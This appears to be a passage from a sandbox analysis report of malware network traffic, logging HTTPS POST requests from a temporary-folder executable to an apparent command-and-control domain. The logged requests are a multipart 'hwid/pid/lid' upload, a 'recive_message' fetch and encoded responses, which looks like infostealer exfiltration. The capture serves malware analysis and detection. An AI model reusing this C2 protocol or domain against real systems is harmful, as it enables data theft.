2024-12-10 10:11:43 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=37MTKWU1N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20519 Host: atten-supporse.biz
2024-12-10 10:11:43 UTC	15331	OUT	Data Raw: 2d 2d 33 37 4d 54 4b 57 55 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 33 37 4d 54 4b 57 55 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 37 4d 54 4b 57 55 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 37 4d 54 4b 57 55 31 4e 0d 0a 43 6f 6e 74 65 6e Data Ascii: --37MTKWU1NContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--37MTKWU1NContent-Disposition: form-data; name="pid"3--37MTKWU1NContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--37MTKWU1NConten
2024-12-10 10:11:43 UTC	5188	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2024-12-10 10:11:44 UTC	1022	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n289aoc3jeub7nj9u5gosm797r; expires=Sat, 05-Apr-2025 03:58:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2Vo98eeqs78%2Fiz083R2W4F%2FvPU7CHL9KwsuAfGyYNmZadC%2BpSo6yd7sHp7DFz%2FenbnzZjPYJozPepYXps1qtqXYYe1aSgjR4uckaa9bOilUyVJ9xPIEPTFRYmeIZNZgqOuxW0M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc73d51e837cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1790&rtt_var=676&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21474&delivery_rate=1613259&cwnd=197&unsent_bytes=0&cid=609df235e8d9e9c2&ts=1244&x=0"
2024-12-10 10:11:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49948	104.21.32.1	443	5036	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:46 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-10 10:11:46 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-10 10:11:47 UTC	1020	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vsul1qkfo501nlrvs8bj9ikung; expires=Sat, 05-Apr-2025 03:58:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHbvpo%2FFm0C77qkVl%2F89L1cwktm90koIJdnQ3XYYnQ3fXMRogZux%2Bnhq7vgTqDbEyqY62r7vzk6iZDGSrRqsgzfAlOC6wzH3y9jbDsJZaFuI248%2F%2BmtBpn15sjKhANyTpybWH5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc73e74e7a41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1760&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1659090&cwnd=205&unsent_bytes=0&cid=cc2aada9756d2819&ts=1226&x=0"
2024-12-10 10:11:47 UTC	349	IN	Data Raw: 31 64 32 64 0d 0a 44 36 6a 50 32 2b 46 69 4f 31 5a 53 48 7a 30 36 55 7a 73 70 65 46 57 61 6c 43 49 4f 45 42 6a 78 74 4f 57 74 42 41 44 71 7a 44 35 30 69 72 6e 35 32 31 59 58 64 43 46 36 48 77 41 6e 53 56 77 64 65 62 6a 31 52 69 77 71 66 70 44 59 6c 73 67 6f 49 70 79 68 48 44 58 4f 72 72 65 53 42 78 64 30 4e 32 63 66 41 41 68 41 43 78 30 37 75 4b 34 41 61 33 70 36 6b 4e 69 48 7a 47 39 76 6d 71 42 64 5a 38 53 6f 73 34 51 42 58 7a 63 2b 63 6c 68 66 4e 6c 70 44 46 6a 7a 33 2f 45 38 73 50 44 71 55 7a 73 65 58 4a 6b 32 50 75 46 39 43 79 62 79 77 77 78 38 58 4c 58 42 36 55 78 68 70 47 55 67 64 4e 2f 62 79 52 6d 56 34 63 4a 6e 51 68 73 6c 75 63 49 4f 71 56 6d 66 4b 71 37 4b 4f 43 45 73 36 4e 48 56 54 57 54 78 61 43 31 52 33 2f 2b 34 41 4e 44 49 70 6f 64 57 57 33 Data Ascii: 1d2dD6jP2+FiO1ZSHz06UzspeFWalCIOEBjxtOWtBADqzD50irn521YXdCF6HwAnSVwdebj1RiwqfpDYlsgoIpyhHDXOrreSBxd0N2cfAAhACx07uK4Aa3p6kNiHzG9vmqBdZ8Sos4QBXzc+clhfNlpDFjz3/E8sPDqUzseXJk2PuF9Cybywwx8XLXB6UxhpGUgdN/byRmV4cJnQhslucIOqVmfKq7KOCEs6NHVTWTxaC1R3/+4ANDIpodWW3
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 4b 71 37 65 43 44 56 6b 6d 4f 48 5a 55 58 53 4e 53 51 68 63 36 2b 50 74 4b 59 33 46 36 6c 4e 79 4e 77 47 78 6d 68 61 4e 61 62 63 72 74 39 38 4d 48 51 58 52 6f 50 58 78 64 49 56 35 48 44 48 58 43 74 6c 38 69 61 7a 71 55 32 73 65 58 4a 6d 71 4e 72 56 39 6d 78 61 36 78 69 42 4a 5a 4a 6a 5a 77 57 6b 6f 33 58 45 55 51 4e 4f 72 38 54 6d 70 78 63 35 6a 66 67 73 68 69 49 73 62 75 57 33 57 4b 39 66 6d 69 44 56 49 34 4f 6d 70 66 47 43 34 58 55 6c 6f 77 39 4c 59 59 4c 48 5a 37 6c 39 65 44 77 57 68 6d 68 4b 68 53 59 4d 57 72 73 34 4d 48 55 7a 77 34 66 46 4a 54 50 6c 6c 4f 46 7a 50 2b 2b 6b 46 70 4d 6a 54 54 30 5a 2b 50 50 69 4b 6d 71 56 39 2f 69 4a 69 36 6a 51 35 65 49 6e 42 69 45 55 46 78 58 6b 64 61 62 37 6a 34 52 57 4e 67 65 34 48 54 69 64 31 71 5a 34 36 6a 58 32 Data Ascii: Kq7eCDVkmOHZUXSNSQhc6+PtKY3F6lNyNwGxmhaNabcrt98MHQXRoPXxdIV5HDHXCtl8iazqU2seXJmqNrV9mxa6xiBJZJjZwWko3XEUQNOr8Tmpxc5jfgshiIsbuW3WK9fmiDVI4OmpfGC4XUlow9LYYLHZ7l9eDwWhmhKhSYMWrs4MHUzw4fFJTPllOFzP++kFpMjTT0Z+PPiKmqV9/iJi6jQ5eInBiEUFxXkdab7j4RWNge4HTid1qZ46jX2
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 6a 51 35 65 49 6e 42 69 45 55 46 78 58 6b 64 61 62 37 6a 37 53 47 6c 33 64 5a 4c 63 69 63 70 73 62 6f 43 67 58 33 2f 46 71 62 6d 50 43 46 4d 35 50 6e 6c 58 55 54 70 53 54 52 6f 32 38 72 59 4f 4c 48 56 69 30 34 37 48 2b 32 46 75 68 61 45 65 57 4d 6d 6a 74 34 51 57 47 53 74 2b 5a 42 39 66 50 52 6b 54 57 6a 76 78 39 6b 74 6d 64 6e 71 55 32 34 4c 4d 59 57 47 46 71 56 5a 6a 7a 61 6d 31 69 67 31 66 4e 44 64 35 57 6b 6f 30 55 45 63 57 64 37 61 32 52 33 51 79 49 74 50 35 67 4e 6c 6c 54 59 75 2f 56 53 33 56 34 36 44 44 42 31 56 30 61 44 31 59 58 54 6c 53 54 52 49 33 36 76 4e 4f 5a 33 4e 77 6c 64 65 4b 77 32 42 69 69 61 35 61 59 63 71 71 76 70 45 53 58 44 49 69 64 78 38 57 63 56 35 54 57 6d 2b 34 77 46 42 37 59 32 7a 52 34 34 54 42 61 47 57 65 37 6b 4d 6a 30 2b 32 Data Ascii: jQ5eInBiEUFxXkdab7j7SGl3dZLcicpsboCgX3/FqbmPCFM5PnlXUTpSTRo28rYOLHVi047H+2FuhaEeWMmjt4QWGSt+ZB9fPRkTWjvx9ktmdnqU24LMYWGFqVZjzam1ig1fNDd5Wko0UEcWd7a2R3QyItP5gNllTYu/VS3V46DDB1V0aD1YXTlSTRI36vNOZ3NwldeKw2Biia5aYcqqvpESXDIidx8WcV5TWm+4wFB7Y2zR44TBaGWe7kMj0+2
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 79 59 34 63 31 4a 54 50 6c 4a 5a 47 6a 72 38 2b 6b 52 6b 65 58 44 54 6d 4d 66 49 66 69 4c 51 37 6d 6c 67 78 61 32 36 6c 55 42 47 65 69 6b 39 57 46 52 78 41 51 73 57 4f 66 6a 35 54 47 42 35 63 70 4c 61 69 63 68 6a 61 34 43 6d 54 6d 7a 4f 70 62 69 4e 44 31 67 77 4e 58 68 62 58 7a 56 66 52 46 70 35 75 50 46 59 4c 43 6f 36 76 50 47 79 6a 55 64 59 79 4c 45 53 64 49 71 71 74 63 4e 59 47 54 67 7a 63 56 64 58 4e 31 42 48 45 44 37 7a 2b 6b 74 6f 66 6e 4f 57 30 49 62 4b 59 32 4f 4d 6f 6c 5a 72 79 61 36 32 6a 41 39 52 64 48 34 39 57 45 42 78 41 51 73 2f 49 50 50 34 52 69 78 74 4e 49 71 57 67 4d 4d 6d 4f 73 69 69 56 57 76 4d 71 4c 57 43 42 6c 45 78 4f 48 6c 65 58 6a 64 61 52 42 34 79 2b 66 6c 45 59 48 78 77 6b 74 65 4c 78 47 6c 70 6a 65 34 53 4c 63 32 31 2b 64 74 41 Data Ascii: yY4c1JTPlJZGjr8+kRkeXDTmMfIfiLQ7mlgxa26lUBGeik9WFRxAQsWOfj5TGB5cpLaichja4CmTmzOpbiND1gwNXhbXzVfRFp5uPFYLCo6vPGyjUdYyLESdIqqtcNYGTgzcVdXN1BHED7z+ktofnOW0IbKY2OMolZrya62jA9RdH49WEBxAQs/IPP4RixtNIqWgMMmOsiiVWvMqLWCBlExOHleXjdaRB4y+flEYHxwkteLxGlpje4SLc21+dtA
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 70 61 55 7a 35 56 43 31 52 33 2f 2b 34 41 4e 44 4a 55 6d 4d 57 51 7a 47 68 70 6e 72 55 63 63 6f 53 30 2b 59 51 4d 47 57 78 77 66 6c 52 54 4e 56 6c 48 47 6a 50 31 39 6c 4a 6a 64 58 32 61 33 5a 58 46 59 57 57 44 70 6c 64 69 7a 4c 2b 31 6a 52 4a 63 4a 69 49 39 45 52 67 32 51 51 74 43 64 38 37 78 55 48 78 78 4f 4b 4c 41 68 4e 6c 74 62 34 54 75 51 79 50 54 37 62 36 50 51 41 46 30 4e 6e 4a 57 57 7a 35 59 51 68 59 36 2f 66 39 46 62 58 52 2b 6d 64 79 48 79 57 42 6a 6a 61 52 66 62 4d 43 6b 76 6f 73 48 57 69 5a 77 4d 78 39 66 4b 52 6b 54 57 68 37 2f 35 45 35 38 4d 6d 58 64 7a 38 66 49 61 69 4c 51 37 6c 68 6e 78 61 6d 2b 6a 77 5a 63 4d 6a 31 38 55 46 6b 78 56 6b 38 52 50 76 37 33 54 57 6c 2f 66 6f 48 63 6a 4d 42 71 61 34 53 6a 48 43 4f 4b 71 71 48 44 57 42 6b 46 50 Data Ascii: paUz5VC1R3/+4ANDJUmMWQzGhpnrUccoS0+YQMGWxwflRTNVlHGjP19lJjdX2a3ZXFYWWDpldizL+1jRJcJiI9ERg2QQtCd87xUHxxOKLAhNltb4TuQyPT7b6PQAF0NnJWWz5YQhY6/f9FbXR+mdyHyWBjjaRfbMCkvosHWiZwMx9fKRkTWh7/5E58MmXdz8fIaiLQ7lhnxam+jwZcMj18UFkxVk8RPv73TWl/foHcjMBqa4SjHCOKqqHDWBkFP
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 37 53 30 45 52 4d 76 58 37 54 57 39 30 66 4a 6a 61 6c 63 5a 6d 59 59 50 75 45 69 33 4e 74 66 6e 62 51 48 6f 6a 4a 6e 64 59 56 43 64 53 53 68 6b 68 39 65 59 41 49 6a 4a 72 6c 4d 66 48 6c 33 42 79 6e 36 6c 44 49 39 50 74 76 6f 39 41 41 58 51 32 64 46 6c 66 4e 31 64 5a 48 7a 48 33 2b 55 6c 6c 64 6e 4b 51 31 6f 50 4c 59 57 65 4c 6f 6c 64 71 79 61 4b 39 69 67 35 51 4f 33 41 7a 48 31 38 70 47 52 4e 61 46 75 50 31 54 47 45 79 5a 64 33 50 78 38 68 71 49 74 44 75 55 47 50 50 72 62 4f 46 42 46 77 79 4f 6e 68 66 55 7a 4a 57 54 78 77 7a 39 2f 5a 4c 5a 58 4e 38 6c 74 79 4d 79 57 74 68 6a 71 67 63 49 34 71 71 6f 63 4e 59 47 52 51 72 63 46 4e 66 63 55 59 46 41 33 66 2f 2b 67 41 30 4d 6e 47 66 30 6f 44 50 61 32 47 41 71 31 68 6e 7a 36 32 78 6b 51 68 5a 4d 79 4a 76 58 31 Data Ascii: 7S0ERMvX7TW90fJjalcZmYYPuEi3NtfnbQHojJndYVCdSShkh9eYAIjJrlMfHl3Byn6lDI9Ptvo9AAXQ2dFlfN1dZHzH3+UlldnKQ1oPLYWeLoldqyaK9ig5QO3AzH18pGRNaFuP1TGEyZd3Px8hqItDuUGPPrbOFBFwyOnhfUzJWTxwz9/ZLZXN8ltyMyWthjqgcI4qqocNYGRQrcFNfcUYFA3f/+gA0MnGf0oDPa2GAq1hnz62xkQhZMyJvX1
2024-12-10 10:11:47 UTC	283	IN	Data Raw: 57 67 6d 34 35 45 4e 38 63 58 57 43 36 4d 65 58 66 31 7a 49 70 55 70 71 32 71 36 76 69 41 31 56 4a 51 34 39 42 77 78 6a 43 78 6c 49 5a 65 65 32 58 31 4d 38 4f 70 4b 57 33 2f 5a 2f 49 70 37 75 42 44 2b 45 37 61 76 44 57 42 6c 7a 4d 32 39 4e 58 6a 4a 50 53 46 30 4a 78 74 46 57 5a 6e 56 71 6c 4d 47 49 6a 79 67 69 68 2b 34 45 56 49 71 6b 76 70 67 52 54 7a 6b 67 65 68 39 6e 66 78 6c 54 57 6d 2b 34 77 30 4e 69 66 48 32 46 78 38 72 6f 63 47 69 50 76 6c 74 36 78 65 33 33 77 77 59 5a 62 47 4d 7a 48 31 77 67 47 52 4e 4b 5a 61 4f 6a 45 7a 73 69 4b 49 79 59 6e 6f 39 77 49 74 44 38 45 69 33 59 37 65 48 44 52 31 6f 6d 49 6e 74 63 54 6a 49 65 64 53 51 51 34 76 74 47 65 32 4e 45 72 64 47 64 77 6d 42 31 6d 65 4a 4a 62 73 53 6a 76 70 56 41 46 33 51 2f 50 51 64 68 63 52 45 Data Ascii: Wgm45EN8cXWC6MeXf1zIpUpq2q6viA1VJQ49BwxjCxlIZee2X1M8OpKW3/Z/Ip7uBD+E7avDWBlzM29NXjJPSF0JxtFWZnVqlMGIjygih+4EVIqkvpgRTzkgeh9nfxlTWm+4w0NifH2Fx8rocGiPvlt6xe33wwYZbGMzH1wgGRNKZaOjEzsiKIyYno9wItD8Ei3Y7eHDR1omIntcTjIedSQQ4vtGe2NErdGdwmB1meJJbsSjvpVAF3Q/PQdhcRE
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 32 31 34 39 0d 0a 4c 71 6f 77 30 34 5a 4d 6e 41 6c 44 78 5a 78 58 56 70 61 62 36 69 6b 47 7a 6b 68 4c 63 4f 45 6d 49 46 2f 49 70 37 75 42 44 2b 45 37 61 76 44 57 42 6c 7a 4d 32 39 4e 58 6a 4a 50 53 46 30 4a 78 74 68 48 61 6e 64 39 67 35 53 70 78 48 4a 6c 79 4f 41 63 59 6f 72 31 67 4d 4e 49 47 51 74 2b 50 55 63 59 61 52 6c 2b 47 54 6e 32 38 56 5a 39 50 31 53 55 30 49 4c 49 64 69 43 6d 70 55 68 71 69 75 50 35 68 55 41 42 5a 48 34 39 57 30 6c 78 41 52 74 49 62 4b 32 6c 46 7a 77 67 5a 64 33 50 78 39 6b 6d 4f 74 72 67 48 48 2b 4b 39 66 6e 45 41 30 73 6d 4e 6e 35 4a 57 33 5a 6e 64 52 6b 68 39 66 6c 4c 62 55 78 45 76 64 75 47 7a 47 67 67 75 62 68 52 66 63 6d 6f 76 72 30 2b 56 7a 4d 6b 65 6c 46 65 4d 52 6b 46 57 6a 69 34 72 6e 6b 73 4f 6a 71 73 6d 4d 66 58 4a 6a Data Ascii: 2149Lqow04ZMnAlDxZxXVpab6ikGzkhLcOEmIF/Ip7uBD+E7avDWBlzM29NXjJPSF0JxthHand9g5SpxHJlyOAcYor1gMNIGQt+PUcYaRl+GTn28VZ9P1SU0ILIdiCmpUhqiuP5hUABZH49W0lxARtIbK2lFzwgZd3Px9kmOtrgHH+K9fnEA0smNn5JW3ZndRkh9flLbUxEvduGzGggubhRfcmovr0+VzMkelFeMRkFWji4rnksOjqsmMfXJj
2024-12-10 10:11:47 UTC	1369	IN	Data Raw: 50 5a 69 79 39 35 70 41 54 33 52 6f 4c 78 45 59 49 78 6b 54 57 6e 44 37 35 46 4a 71 63 57 79 51 6b 62 6e 78 51 57 79 50 72 30 70 39 78 36 47 59 67 42 46 54 43 67 35 6f 58 46 59 2f 58 6c 30 4c 64 37 61 32 54 79 77 71 51 39 4f 65 78 2f 41 6f 49 70 44 75 42 43 33 2f 72 72 65 4e 42 30 38 6c 66 56 70 52 58 7a 42 50 57 78 63 37 32 66 56 52 5a 6a 49 30 30 39 44 48 6c 7a 51 73 79 4b 70 4e 4c 5a 4c 39 36 39 68 56 43 6d 4e 67 4c 30 41 57 4b 42 6c 64 57 6d 2b 71 75 41 42 2b 4d 69 4c 54 6b 59 54 64 64 47 53 4c 75 46 38 71 39 4a 4f 63 6c 41 4e 4a 4d 6a 4e 44 59 58 4d 39 58 30 77 41 4d 50 37 51 59 43 77 38 4f 70 79 57 33 2f 59 6d 4b 73 69 52 45 69 33 53 37 65 48 44 4e 56 6f 36 50 6e 70 4a 53 58 78 38 58 42 6b 6e 2f 76 55 41 49 6a 4a 38 30 34 37 58 67 53 5a 6d 6d 65 34 Data Ascii: PZiy95pAT3RoLxEYIxkTWnD75FJqcWyQkbnxQWyPr0p9x6GYgBFTCg5oXFY/Xl0Ld7a2TywqQ9Oex/AoIpDuBC3/rreNB08lfVpRXzBPWxc72fVRZjI009DHlzQsyKpNLZL969hVCmNgL0AWKBldWm+quAB+MiLTkYTddGSLuF8q9JOclANJMjNDYXM9X0wAMP7QYCw8OpyW3/YmKsiREi3S7eHDNVo6PnpJSXx8XBkn/vUAIjJ8047XgSZmme4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49950	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:47 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T6JH0R4Y7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1263 Host: atten-supporse.biz
2024-12-10 10:11:47 UTC	1263	OUT	Data Raw: 2d 2d 54 36 4a 48 30 52 34 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 36 4a 48 30 52 34 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 36 4a 48 30 52 34 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 54 36 4a 48 30 52 34 59 37 0d 0a 43 6f 6e 74 65 6e Data Ascii: --T6JH0R4Y7Content-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--T6JH0R4Y7Content-Disposition: form-data; name="pid"1--T6JH0R4Y7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--T6JH0R4Y7Conten
2024-12-10 10:11:47 UTC	1016	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mt5moqob7me7fj79v5f1lesj21; expires=Sat, 05-Apr-2025 03:58:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7%2B1tbrjog5wEGNKSPp8pDhnCKLtDcQxRkYt7MhB8iOKDtj47i6l9LbbjOAwEtes8cd2tkFH9183jtjTTY3sOuL0o5WzHUCJdR%2F%2Betf7BsnRN2jnWhcWOeEzCEuJD62DgWZX5Wc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc73ec4dce1885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1660&rtt_var=637&sent=8&recv=9&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2173&delivery_rate=1699650&cwnd=193&unsent_bytes=0&cid=5ad82ee7896bc4e7&ts=960&x=0"
2024-12-10 10:11:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49987	104.21.32.1	443	5036	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:52 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IZZIWX71TCZPZB622JO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12847 Host: atten-supporse.biz
2024-12-10 10:11:52 UTC	12847	OUT	Data Raw: 2d 2d 49 5a 5a 49 57 58 37 31 54 43 5a 50 5a 42 36 32 32 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 49 5a 5a 49 57 58 37 31 54 43 5a 50 5a 42 36 32 32 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 5a 5a 49 57 58 37 31 54 43 5a 50 5a 42 36 32 32 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --IZZIWX71TCZPZB622JOContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--IZZIWX71TCZPZB622JOContent-Disposition: form-data; name="pid"2--IZZIWX71TCZPZB622JOContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-10 10:11:53 UTC	1026	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nkjqc52akphfnrq5382kdvds65; expires=Sat, 05-Apr-2025 03:58:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zpft1nr%2FoGe1tcTm0T3BL5AwzFzKPe1sPsMlIoJSkXzwiJNA%2Bxhpxo95W6uq6%2ByNrO%2FjxF%2BR1ss8JhWFwR2helKvQwjXNfnmnfbE1WuvhNdQ8vjIJCA4AemR3PrKkyU3vIFl%2FQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc740d49c91885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1545&rtt_var=662&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13790&delivery_rate=1555673&cwnd=193&unsent_bytes=0&cid=4d0061a315738754&ts=1732&x=0"
2024-12-10 10:11:53 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
